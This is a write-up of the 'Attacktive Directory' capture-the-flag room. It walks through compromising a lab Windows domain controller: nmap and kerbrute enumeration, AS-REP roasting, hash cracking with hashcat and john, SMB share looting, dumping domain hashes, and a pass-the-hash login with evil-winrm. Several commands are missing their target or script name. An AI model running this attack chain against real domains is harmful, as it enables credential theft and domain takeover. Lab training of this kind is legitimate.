Attacktive Directory Walkthrough - Offensive Pentesting

Room Attacktive Directory
Target OS Windows
Difficulty Easy
Description 99% of Corporate networks run off of AD. But can you exploit a vulnerable Domain Controller?
Maker Sq00ky


As always, the first step consists of the reconnaissance phase as port scanning.

Ports Scanning

During this step, we’re gonna identify the target to see what we have behind the IP Address.

nmap -sC -sV -oA nmap

53/tcp   open  domain?                                                                                                                                     
| fingerprint-strings:                                                                                                                                     
|   DNSVersionBindReqTCP:                                                                                                                                  
|     version                                                                                                                                              
|_    bind                                                                                                                                                 
80/tcp   open  http          Microsoft IIS httpd 10.0                                                                                                      
| http-methods:             
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0                        
|_http-title: IIS Windows Server
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2020-09-30 22:45:59Z)                                    
135/tcp  open  msrpc         Microsoft Windows RPC                                           
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)                                                           
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?       
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped           
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)                                                           
3269/tcp open  tcpwrapped      
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:                                                             
|   Target_Name: THM-AD                                                      
|   NetBIOS_Domain_Name: THM-AD                                              
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC                  
|   DNS_Domain_Name: spookysec.local                                                                                                                       
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local                                   
|   Product_Version: 10.0.17763                                              
|_  System_Time: 2020-09-30T22:48:24+00:00                                
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local                          
| Not valid before: 2020-09-29T21:34:03                                                      
|_Not valid after:  2021-03-31T21:34:03                                                      
|_ssl-date: 2020-09-30T22:48:40+00:00; 0s from scanner time.                                 
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at :
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating Port 80

We can start by looking at the webserver. There’s a default IIS web server page we can do directory enumeration but this box is related to Active Directory so let’s move forward.

There’s a DNS Domain name that we’re going to insert in the host’s file. echo spookysec.local >> /etc/hosts

Enumerating SMB

Let’s enumerate 139, 445 ports.


enum4linux -a spookysec.local

Nmap output suggested our Domain Name was spookysec.local however, enum4linux shows THM-AD.

enum4linux failed to provide much information such as users.


kerbrute userenum --dc spookysec.local -d spookysec.local userlist.txt

2020/10/01 04:50:02 >  [+] VALID USERNAME:       james@spookysec.local
2020/10/01 04:50:06 >  [+] VALID USERNAME:       svc-admin@spookysec.local
2020/10/01 04:50:12 >  [+] VALID USERNAME:       James@spookysec.local
2020/10/01 04:50:14 >  [+] VALID USERNAME:       robin@spookysec.local
2020/10/01 04:50:36 >  [+] VALID USERNAME:       darkstar@spookysec.local
2020/10/01 04:50:50 >  [+] VALID USERNAME:       administrator@spookysec.local
2020/10/01 04:51:28 >  [+] VALID USERNAME:       backup@spookysec.local
2020/10/01 04:51:41 >  [+] VALID USERNAME:       paradox@spookysec.local
2020/10/01 04:53:01 >  [+] VALID USERNAME:       JAMES@spookysec.local
2020/10/01 04:53:28 >  [+] VALID USERNAME:       Robin@spookysec.local
2020/10/01 04:56:11 >  [+] VALID USERNAME:       Administrator@spookysec.local
2020/10/01 05:02:01 >  [+] VALID USERNAME:       Darkstar@spookysec.local
2020/10/01 05:03:55 >  [+] VALID USERNAME:       Paradox@spookysec.local
2020/10/01 05:10:02 >  [+] VALID USERNAME:       DARKSTAR@spookysec.local
2020/10/01 05:11:51 >  [+] VALID USERNAME:       ori@spookysec.local
2020/10/01 05:15:01 >  [+] VALID USERNAME:       ROBIN@spookysec.local

Exploiting Kerberos

We now want to crack Active Directory passwords with AS-REP Roasting. This is an attack against Kerberos for user accounts that do not require pre-authentication.

python /opt/impacket/examples/ spookysec.local/ -usersfile valid-users.txt


Let’s decrypt the hash using hashcat and login to smb.

hashcat -m 18200 svc-admin.txt /usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt --force

“-m 18200” specifies the “mode” we want to use. Use the Hashcat Wiki to read all the different modes when cracking hash values:

Hashcat Wiki

OR you can use john as well.

john svc-admin.txt --wordlist=/usr/share/wordlists/SecLists/AD-Wordlists/passwordlist.txt

Running john or hashcat will give us a password.

Enumerating the DC (Domain Controller)

As we found a password from our previous step we’re gonna use those creds to login to smb shares.

smbclient -L // --user svc-admin

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 

We found some shares and backup seems interesting.

We found the backup_credentials.txt file inside the backup share.

Let’s take a look at what’s that includes.


It’s a base64 encoding.

Decrypting that will give another credential for the user backup.

Elevating Privileges

python -just-dc backup@spookysec.local

Dumping this revels administrator NTLM hash. Now we can crack the hash or use evil-winrm to connect to the administrator.

./evil-winrm.rb -i -u Administrator -H (HASH HERE)